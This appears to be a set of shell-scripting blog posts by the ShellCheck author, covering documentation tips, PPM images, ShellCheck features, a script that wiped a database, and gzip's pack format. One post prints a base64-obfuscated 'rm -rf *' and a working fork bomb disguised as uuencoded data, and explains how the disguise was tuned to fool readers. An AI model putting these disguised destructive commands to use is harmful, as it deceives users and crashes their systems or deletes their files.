${var?} and &&: Two simple tips for shell commands in tech docs

tl;dr: Use error-if-unset ${placeholders?} and join commands with && to make it easier and safer to copy-paste shell commands from technical documentation.

I frequently read documentation that includes shell commands, and copy-paste them into a shell. It might look something like this:

To install a JDK:

sudo apt-get update
sudo apt-get install openjdk-<VERSION>-jdk

Obviously this example is particularly simple and clear. A more realistic case might have several 160+ character commands invoking unfamiliar tools and utility scripts with a variety of fixed and variable parameters. To see far too many instances of this, check out your company’s internal wiki.

You, as the documentation author or editor, can improve such command listings in two simple ways.

Use ${NAME?} instead of ad-hoc placeholders like <NAME> or NAME

If I accidentally miss one of the placeholders where I was supposed to insert something, this error-if-unset POSIX compatible syntax will cause a command to fail fast with a simple and clear error message:

$ sudo apt-get install openjdk-${VERSION?}-jdk
bash: VERSION: parameter not set

(Assuming there is no existing environment variable by the same name, that is!)

Compare this to the original angle brackets, which in the best case fail somewhat obtusely:

$ sudo apt-get install openjdk-<VERSION>-jdk
bash: VERSION: No such file or directory

and otherwise, will create/truncate files while giving misleading errors (if I’m lucky enough to get one):

$ sudo apt-get install openjdk-<VERSION>-jdk
E: Unable to locate package openjdk
$ grep VERSION *
grep: invalid option -- 'j'

Here the redirection >-jdk was interpreted as a file redirection (just like in to echo Hi > foo.txt), and created a file -jdk that causes otherwise fine commands with globs to fail in unexpected ways (and imagine what would happen with grep <alias name> ~/.bashrc!)

For just an uppercase word, it can be hard to tell whether something like ID is part of the command or whether it’s a placeholder. The command will try to execute whether or not I guess correctly.

Use && between consecutive commands

I get not just one but two benefits when you use && to join multiple consecutive commands:

sudo apt-get update &&
sudo apt-get install openjdk-${VERSION?}-jdk

The first and well known one is that each command will only run if the previous ones succeeded. Instead of powering through errors and running commands from an increasingly unknown state, the shell will stop so I can get it back on track and continue correctly.

The second and more subtle benefit is that this will make the shell read all commands up front, before it starts executing any. This matters when any of the commands request input. Here’s what happens when I paste the original example:

$ sudo apt-get update
[sudo] password for vidar:
Sorry, try again.
[sudo] password for vidar:

I pasted two commands, but the first one requested a password. The second command was then read as that password, leading to the "Sorry, try again" error.

When I now enter my actual password, only the first command will run. I won’t have any further indication that one of the commands has been swallowed up.

Compare this to using &&, where the shell patiently reads all of the commands beforehand (with a continuation prompt >), and only then executes them:

$ sudo apt-get update &&
> sudo apt-get install openjdk-14-jdk
[sudo] password for vidar:

When I enter my password now, both commands will run as expected.

Conclusion

These simple tips, alone or together, can help make it easier for users to follow instructions involving shell commands, leading to fewer and more easily fixed mistakes. This makes their lives easier, and by extension, yours.

Use echo/printf to write images in 5 LoC with zero libraries or headers

tl;dr: With the Netpbm file formats, it’s trivial to output pixels using nothing but text based IO

To show that there’s nothing up my sleeves, here’s an image:

A computer generated image of gently shaded, repeating squares

And here’s the complete, dependency free bash script that generates it:

#!/bin/bash
exec > my_image.ppm    # All echo statements will write here
echo "P3 250 250 255"  # magic, width, height, max component value
for ((y=0; y<250; y++)) {
  for ((x=0; x<250; x++)) {
    echo "$((x^y)) $((x^y)) $((x|y))" # r, g, b
  }
}

That’s it. That’s all you need to generate an image that can be read by common tools like GIMP, ImageMagick and Netpbm.

To rewind for a second, it’s sometimes useful to output an image to do printf debugging of 2D algorithms, to visualize data, or simply because you have some procedural pixels you want to put on screen.

However — at least if you hadn’t seen the above example — the threshold to start outputting graphics could seem rather high. Even with a single file library, that’s one more thing to set up and figure out. This is especially annoying during debugging, when you know you’re going to delete it within the hour.

Fortunately, the Netpbm suite of tools have developed an amazingly flexible solution: a set of lowest common denominator file formats for full color Portable PixMaps (PPM), Portable GrayMaps (PGM), and monochrome Portable BitMaps (PBM), that can all be written as plain ASCII text using any language’s basic text IO.

Collectively, the formats are known as PNM: Portable aNyMaps.

The above bash script is more than enough to get started, but a detailed description of the file format with examples can be found in man ppm, man pgm, and man pbm on a system with Netpbm installed.

Each man page describes two version of a simple file format: one binary and one ASCII. Either is completely trivial to implement, though the ASCII ones are my favorite for being so ridiculously barebones that you can write them by hand in Notepad.

To convert them to more common file formats, either open and export in GIMP, use ImageMagick convert my_file.ppm my_file.png, or NetPBM pnmtopng < my_file.ppm > my_file.png

Should you wish to input images using this trivial ASCII format, the NetPBM tool pnmtoplainpnm will convert a binary ppm/pgm/pbm (as produced by any tool including Netpbm’s anytopnm) into an ASCII ppm/pgm/pbm.

If your goal is to experiment with any kind of image processing algorithm, you can easily slot into Netpbm’s wonderfully Unix-y set of tools by reading/writing PPM on stdin/stdout:

curl http://example.com/input.png | 
    pngtopnm | 
    ppmbrighten -v +10 |
    yourtoolhere |
    pnmscale 2 |
    pnmtopng > output.png

What’s new in ShellCheck v0.7.0?

ShellCheck v0.7.0 has just been released. In addition to the usual “bug fixes and improvements”, there is a set of new features:

Autofixes

A few select warnings now come with auto-fixes. In the most straight-forward case, ShellCheck shows you what it thinks the line ought to be:

In foo line 2:
echo "File size: $(stat -c %s $1)"
                              ^-- SC2086: Double quote to prevent globbing and word splitting.

Did you mean:
echo "File size: $(stat -c %s "$1")"

To actually apply the fixes, you can use ShellCheck’s new diff output format, which outputs standard Unified Diffs that can be piped into tools like git apply and patch:

$ shellcheck -f diff foo
--- a/foo
+++ b/foo
@@ -1,2 +1,2 @@
 #!/bin/sh
-echo "File size: $(stat -c %s $1)"
+echo "File size: $(stat -c %s "$1")"

For example, to apply only SC2086 fixes to all .sh file in a project:

$ shellcheck --include=SC2086 -f diff **/*.sh | git apply

Optional Checks

ShellCheck now includes a small handful of checks that are off by default. These are intended for subjective issues that a project may choose to enforce:

$ cat foo
#!/bin/sh
# shellcheck enable=require-variable-braces
name=World
echo "Hello $name"

$ shellcheck foo
In foo line 4:
echo "Hello $name"
            ^---^ SC2250: Prefer putting braces around variable references even when not strictly required.

Did you mean:
echo "Hello ${name}"

For a list of such checks, run shellcheck --list-optional

source paths

ShellCheck now allows you to specify a list of search locations for sourced scripts using a # shellcheck source-path=/my/dir directive or --source-path flag.

This is useful in several cases:

  • If all the projects’ sourced files are relative to the same directory, you can now specify this directory once instead of having to add source directives everywhere.
  • The special name SCRIPTDIR can be specified in a path to refer to the location of the script being checked, allowing ShellCheck to more conveniently discover included files from the same directory. This also works for any path relative to the script’s directory, such as SCRIPTDIR/../include/
  • Absolute paths are also grounded in the source path, so by specifying source-path=/mnt/chroot, shellcheck will look for . /bin/funcs.sh in /mnt/chroot/bin/funcs.sh. This is useful when targeting a specific system, such as an embedded one.

RC files

Rather than adding directives in each file, you can now set most of the options above in a .shellcheckrc file in the project’s root directory (or your home directory). This allows you to easily apply the same options to all scripts on a per-project/directory basis.

Bats and shflags support

ShellCheck no longer needs any preprocessing to check Bats scripts:

$ cat test.bats
#!/usr/bin/env bats

@test "addition using bc" {
  result="$(echo 2+2 | bc)"
  [ "$result" -eq 4 ]
}

$ shellcheck test.bats && echo "Success"
Success

A bats shebang will be interpreted as “bash”, and @test statements will be correctly parsed.

ShellCheck now also recognizes DEFINE_* statements from the shflags library:

DEFINE_string 'name' 'world' 'name to say hello to' 'n'
              ^----^ SC2034: FLAGS_name appears unused. Verify use (or export if used externally).

For a more extensive list of changes, check out the ChangeLog.

Happy ShellChecking!

Tricking the tricksters with a next level fork bomb

Do not copy-paste anything from this article into your shell. You have been warned.

Some people make a cruel sport out of tricking newbies into running destructive shell commands.

Often, this takes the form of crudely obscured commands like this one, which will result in a rm -rf * being executed in the current directory, deleting everything:

$(echo cm0gLXJmICoK | base64 -d)

Years ago, I came across someone doing this, and decided to trick them back.

Now, I’m not enough of a jerk to trick anyone into deleting their files, but I’m more than willing to let wanna-be hackers fork bomb themselves.

I designed a fork bomb in such a way that even when people know it’s a destructive command, they still run it! At the risk of you doing the same, here it is:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

It looks like yet another crudely obscured command, but it’s not. It does not prey on unsuspecting newbies’ tendencies to run commands they don’t understand.

Instead, it targets people who are familiar with that kind of trick, who know it’s going to be destructive, and exploits their schadenfreude and curiosity.

For the previous command, such a person would remove the surrounding $(..) to find out what a victim would have been fooled into executing:

$ echo cm0gLXJmICoK | base64 -d
rm -rf *

But when they similarly modify this command to see what horror will befall the newbie stupid enough to run it:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

They’ll suddenly find their system slowing to a crawl until a forced reboot! As it turns out, they were the newbie all along.

You see, the eval (…dramatic pause…) was a decoy!

In fact, the uudecode, echo and $(..) were all just part of the act. They’re purely for misdirection, and don’t serve any functional purpose.

No decoding, execution or evaluation is required for the bomb to explode. Instead it’s set off by the simple expansion, in any context, of this argument:

"I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;=="

Even most of this string is just for show, designed to make it look more like uuencoded data. Here it is with all the arbitrary characters replaced with underscores:

"____________`_____&r()(____&r{,______}&r{,_____});r`_________"

And here it’s written more cleanly:

" `r() ( r & r ); r` "

Now it’s your bog standard fork bomb in a command expansion.


I went through a few iterations designing this trap. The first one was this:

eval $(echo 'a2Vrf3xvcml'\ZW%3t`r()(r|r);r`2'6a2VrZQo=' | base64 -d)

It has the same basic form, but several problems:

  • Base64 is pretty well known, and this clearly isn’t it
  • It’s quite obvious from the quotes that the literal string stops and starts
  • The fork bomb, r()(r|r);r really sticks out

base64 is almost entirely alphanumeric, e.g. bW9yZSBnYXJiYWdlIGhlcmUK, while uuencoded data (if you can even remember what it looks like), has a bunch of symbols that would obscure any embedded shell code: 1<V]M92!G87)B86=E(&AE<F4`. I broke up the long gibberish base64-ish strings with symbols to match.

For the quotes, I shoved it in simple double quotes and hoped no one would notice the amount of questionable characters put in an interpolated string.

For the bomb itself, I wanted to find a way to insert more gibberish, but without adding any spaces that attract the eyes. Making the string r longer would work, but the repetition would be noticeable.

The fix I ended up with was using brace expansion: foo.{jpg,png} expands to foo.jpg foo.png, and r{,foo} expands to r foo. This invokes r with an argument that the function ignores.

The second version was this:

eval $(echo "I<RA('1E<W3t`p&r()(rofl&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

The idea here was that rofl would be executed on every fork, filling the screen with “rofl: command not found” for some extra finesse, but I figured that such a recognizable word would attract attention and further scrutiny.

In the end, I arrived at the final version, and it was quite effective. Several people involved in the noob sniping sheepishly admitted that they fell for it.

I essentially forgot about it, but other people apparently didn’t. About a year later someone asked about it on SuperUser, where you can find an even better analysis.

And now you have the backstory as well.

A shell script that deleted a database, and how ShellCheck could have helped

Summary: We examine a real world case of how an innocent shell scripting mistake caused the deletion of a production database, and how ShellCheck (a GPLv3 shell script linting and analysis tool) would have pointed out the errors and prevented the disaster.

Disclosure: I am the ShellCheck author.

The event

Here is the sad case, taken from a recent StackOverflow post:

My developer committed a huge mistake and we cannot find our mongo database anyone in the server. Rescue please!!!

He logged into the server, and saved the following shell under ~/crontab/mongod_back.sh:

#!/bin/sh
DUMP=mongodump
OUT_DIR=/data/backup/mongod/tmp     // 备份文件临时目录
TAR_DIR=/data/backup/mongod         // 备份文件正式目录
DATE=`date +%Y_%m_%d_%H_%M_%S`      // 备份文件将以备份时间保存
DB_USER=Guitang                     // 数据库操作员
DB_PASS=qq____________              // 数据库操作员密码
DAYS=14                             // 保留最新14夭的备份
TAR_BAK="mongod_bak_$DATE.tar.gz"   // 备份文件命名格式
cd $OUT_DIR                         // 创建文件夹
rm -rf $OUT_DIR/*                   // 清空临时目录
mkdir -p $OUT_DIR/$DATE             // 创建本次备份文件夹
$DUMP -d wecard -u $DB_USER -p $DB_PASS -o $OUT_DIR/$DATE  // 执行备份命令
tar -zcvf $TAR_DIR/$TAR_BAK $OUT_DIR/$DATE       // 将备份文件打包放入正式目
find $TAR_DIR/ -mtime +%DAYS -delete             // 删除14天前的旧备洲

And then he run ./mongod_back.sh, then there were lots of permission denied, then he did Ctrl+C. Then the server shut down automatically.

He then contacted AliCloud, the engineer connected the disk to another working server, so that he could check the disk. Then, he realized that some folders have gone, including /data/ where the mongodb is!!!

PS: he did not take snapshot of the disk before.

Essentially, it’s every engineer’s nightmare.

The post-mortem of this issue is an interesting puzzle that requires only basic shell scripting knowledge. If you’d like to give it a try, now’s the time. If you’d like some hints, here’s shellcheck’s output for the script.

The rest of this post details about what happened, and how ShellCheck could have averted the disaster.

What went wrong?

The MCVE for how to ruin your week is this:

#!/bin/sh
DIR=/data/tmp    // The directory to delete
rm -rf $DIR/*    // Now delete it

The fatal error here is that // is not a comment in shell scripts. It’s a path to the root directory, equivalent to /.

On some platforms, the rm line would have been fatal by itself, because it’d boil down to rm -rf / with a few other arguments. Implementation these days often don’t allow this though. The disaster in question happened on Ubuntu, whose GNU rm would have refused:

$ rm -rf //
rm: it is dangerous to operate recursively on '//' (same as '/')
rm: use --no-preserve-root to override this failsafe

This is where the assignment comes in.

The shell treats variable assignments and commands as two sides of the same coin. Here’s the description from POSIX:

A “simple command” is a sequence of optional variable assignments and redirections, in any sequence, optionally followed by words and redirections, terminated by a control operator.

(A “simple command” is in contrast to a “compound” command, which are structures like if statements and for loops that contain one or more simple or compound commands.)

This means that var=42 and echo "Hello" are both simple commands. The former has one optional assignment and zero optional words. The latter has zero optional assignments and two optional words.

It also implies that a single simple command can contain both: var=42 echo "Hello"

To make a long spec short, assignments in a simple command will apply only to the invoked command name. If there is no command name, they apply to the current shell. This latter explains var=42 by itself, but when would you use the former?

It’s useful when you want to set a variable for a single command without affecting your the rest of your shell:

$ echo "$PAGER"  # Show current pager
less

$ PAGER="head -n 5" man ascii
ASCII(7)       Linux Programmer's Manual      ASCII(7)

NAME
       ascii  -  ASCII character set encoded in octal,
       decimal, and hexadecimal

$ echo "$PAGER"  # Current pager hasn't changed
less

This is exactly what happened unintentionally in the fatal assignment. Just like how the previous example scoped PAGER to man only, this one scoped DIR to //:

$ DIR=/data/tmp    // The directory to delete
bash: //: Is a directory

$ echo "$DIR"  # The variable is unset
(no output)

This meant that rm -rf $DIR/* became rm -rf /*, and therefore bypassed the check that was is in place for rm -rf /

(Why can’t or won’t rm simply refuse to delete /* too? Because it never sees /*: the shell expands it first, so rm sees /bin /boot /dev /data .... While rm could obviously refuse to remove first level directories as well, this starts getting in the way of legitimate usage – a big sin in the Unix philosophy)

How ShellCheck could have helped

Here’s the output from this minimized snippet (see online):

$ shellcheck myscript

In myscript line 2:
DIR=/data/tmp    // The directory to delete
                 ^-- SC1127: Was this intended as a comment? Use # in sh.


In myscript line 3:
rm -rf $DIR/*    // Now delete it
       ^----^ SC2115: Use "${var:?}" to ensure this never expands to /* .
       ^--^ SC2086: Double quote to prevent globbing and word splitting.
                 ^-- SC2114: Warning: deletes a system directory.

Two issues have already been discussed, and would have averted this disaster:

  • ShellCheck noticed that the first // was likely intended as a comment (wiki: SC1127).
  • ShellCheck pointed out that the second // would target a system directory (wiki: SC2114).

The third is a general defensive technique which would also have prevented this catastrophic rm independently of the two other fixes:

  • ShellCheck suggested using rm -rf ${DIR:?}/* to abort execution if the variable for any reason is empty or unset (wiki: SC2115).

This would mitigate the effect of a whole slew of pitfalls that can leave a variable empty, including echo /tmp | read DIR (subshells), DIR= /tmp (bad spacing) and DIR=$(echo /tmp) (potential fork/command failures).

Conclusion

Shell scripts are really convenient, but also have a large number of potential pitfalls. Many issues that would be simple, fail-fast syntax errors in other languages would instead cause a script to misbehave in confusing, annoying, or catastrophic ways. Many examples can be found in the Wooledge Bash Pitfalls list, or ShellCheck’s own gallery of bad code.

Since tooling exists, why not take advantage? Even if (or especially when!) you rarely write shell scripts, you can install shellcheck from your package manager, along with a suitable editor plugin like Flycheck (Emacs) or Syntastic (Vim), and just forget about it.

The next time you’re writing a script, your editor will show warnings and suggestions automatically. Whether or not you want to fix the more pedantic style issues, it may be worth looking at any unexpected errors and warnings. It might just save your database.

An ode to pack: gzip’s forgotten decompressor

The latest 4.13.9 source release of the Linux kernel is 780MiB, but thanks to xz compression, the download is a much more managable 96 MiB (an 88% reduction)

Before xz took over as the default compression format on kernel.org in 2013, following the "latest" link would have gotten you a bzip2 compressed file. The tar.bz2 would have been 115 MiB (-85%), but there’s was no defending the extra 20 MiB after xz caught up in popularity. bzip2 is all but displaced today.

bzip2 became the default in 2003, though it had long been an option over the less efficient gzip. However, since every OS, browser, language core library, phone and IoT lightswitch has built-in support for gzip, a 148 MiB (-81%) tar.gz remains an option even today.

gzip itself started taking over in 1994, before kernel.org, and before the World Wide Web went mainstream. It must have been a particularly easy sell for the fledgeling Linux kernel: it was made, used and endorsed by the mighty GNU project, it was Free Software, free of patent restrictions, and it provided powerful .zip style DEFLATE compression in a Unix friendly package.

Another nice benefit was that gzip could decompress other contemporary formats, thereby replacing contested and proprietary software.

Among the tools it could replace was compress, the de-facto Unix standard at the time. Created based on LZW in 1985, it was hampered by the same patent woes that plagued GIF files. The then-ubiquitous .Z suffix graced the first public Linux releases, but is now recognized only by the most long-bearded enthusiasts. The current release would have been 302 MiB (-61%) with compress.

Another even more obscure tool it could replace was compress‘s own predecessor, pack. This rather loosely defined collection of only partially compatible formats is why compress had to use a capital Z in its extension. pack came first, and offered straight Huffman coding with a .z extension.

With pack, our Linux release would have been 548 MiB (-30%). Compared to xz‘s 96 MiB, it’s obvious why no one has used it for decades.

Well, guess what: gzip never ended its support! Quoth the man page,

gunzip can currently decompress files created by gzip, zip,
compress, compress -H or pack.

While multiple implementations existed, these were common peculiarities:

  • They could not be used in pipes.
  • They could not represent empty files.
  • They could not compress a file with only one byte value, e.g. "aaaaaa…"
  • They could fail on "large" files. "can’t occur unless [file size] >= [16MB]", a comment said dismissively, from the time when a 10MB hard drive was a luxury few could afford.

These issues stemmed directly from the Huffman coding used. Huffman coding, developed in 1952, is basically an improvement on Morse code, where common characters like "e" get a short code like "011", while uncommon "z" gets a longer one like "111010".

  • Since you have to count the characters to figure out which are common, you can not compress in a single pass in a pipe. Now that memory is cheap, you could mostly get around that by keeping the data in RAM.

  • Empty files and single-valued files hit an edge case: if you only have a single value, the shortest code for it is the empty string. Decompressors that didn’t account for it would get stuck reading 0 bits forever. You can get around it by adding unused dummy symbols to ensure a minimum bit length of 1.

  • A file over 16MB could cause a single character to be so rare that its bit code was 25+ bits long. A decompressor storing the bits to be decoded in a 32bit value (a trick even gzip uses) would be unable to append a new 8bit byte to the buffer without displacing part of the current bit code. You can get around that by using "package merge" length restricted prefix codes over naive Huffman codes.

I wrote a Haskell implementation with all these fixes in place: koalaman/pack is available on GitHub.

During development, I found that pack support in gzip had been buggy since 2012 (version 1.6), but no one had noticed in the five years since. I tracked down the problem and I’m happy to say that version 1.9 will again restore full pack support!

Anyways, what could possibly be the point of using pack today?

There is actually one modern use case: code golfing.

This post came about because I was trying to implement the shortest possible program that would output a piece of simple ASCII art. A common trick is variations of a self-extracting shell script:

sed 1d $0|gunzip;exit
<compressed binary data here>

You can use any available compressor, including xz and bzip2, but these were meant for bigger files and have game ruining overheads. Here’s the result of compressing the ASCII art in question:

  • raw: 269 bytes
  • xz: 216 bytes
  • bzip2: 183 bytes
  • gzip: 163 bytes
  • compress: 165 bytes
  • and finally, pack: 148 bytes!

I was able to save 15 bytes by leveraging gzip‘s forgotten legacy support. This is huge in a sport where winning entries are bytes apart.

Let’s have a look at this simple file format. Here’s an example pack file header for the word "banana":

1f 1e        -- Two byte magic header
00 00 00 06  -- Original compressed length (6 bytes)

Next comes the Huffman tree. Building it is simple to do by hand, but too much for this post. It just needs to be complete, left-aligned, with eof on the right at the deepest level. Here’s the optimal tree for this string:

        /\
       /  a
      /\
     /  \
    /\   n
   b  eof

We start by encoding its depth (3), and the number of leaves on each level. The last level is encoded minus 2, because the lowest level will have between 2 and 257 leaves, while a byte can only store 0-255.

03  -- depth
01  -- level 1 only contains 'a'
01  -- level 2 only contains 'n'
00  -- level 3 contains 'b' and 'eof', -2 as mentioned

Next we encode the ASCII values of the leaves in the order from top to bottom, left to right. We can leave off the EOF (which is why it needs to be in the lower right):

61 6e 62  -- "a", "n" ,"b"

This is enough for the decompressor to rebuild the tree. Now we go on to encode the actual data.

Starting from the root, the Huffman codes are determined by adding a 0 for ever left branch and 1 for every right branch you have to take to get to your value:

a   -> right = 1
n   -> left+right = 01
b   -> left+left+left -> 000
eof -> left+left+right -> 001

banana<eof> would therefore be 000 1 01 1 01 1 001, or when grouped as bytes:

16  -- 0001 0110
C8  -- 1100 1   (000 as padding)

And that’s all we need:

$ printf '\x1f\x1e\x00\x00\x00\x06'\
'\x03\x01\x01\x00\x61\x6e\x62\x16\xc8' | gzip -d
banana

Unfortunately, the mentioned gzip bug triggers due to failing to account for leading zeroes in bit code. eof and a have values 001 and 1, so an oversimplified equality check confuses one for the other, causing gzip to terminate early:

b
gzip: stdin: invalid compressed data--length error

However, if you’re stuck with an affected version, there’s another party trick you can do: the Huffman tree has to be canonical, but it does not have to be optimal!

What would happen if we skipped the count and instead claimed that each ASCII character is equally likely? Why, we’d get a tree of depth 8 where all the leaf nodes are on the deepest level.

It then follows that each 8 bit character will be encoded as 8 bits in the output file, with the bit patterns we choose by ordering the leaves.

Let’s add a header with a dummy length to a file:

$ printf '\x1F\x1E____' > myfile.z

Now let’s append the afforementioned tree structure, 8 levels with all nodes in the last one:

$ printf '\x08\0\0\0\0\0\0\0\xFE' >> myfile.z

And let’s populate the leaf nodes with 255 bytes in an order of our choice:

$ printf "$(printf '\\%o' {0..254})" |
    tr 'A-Za-z' 'N-ZA-Mn-za-m' >> myfile.z

Now we can run the following command, enter some text, and hit Ctrl-D to "decompress" it:

$ cat myfile.z - | gzip -d 2> /dev/null
Jr unir whfg pbaivaprq TMvc gb hafpenzoyr EBG13!
<Ctrl+D>
We have just convinced GZip to unscramble ROT13!

Can you think of any other fun ways to use or abuse gzip‘s legacy support? Post a comment.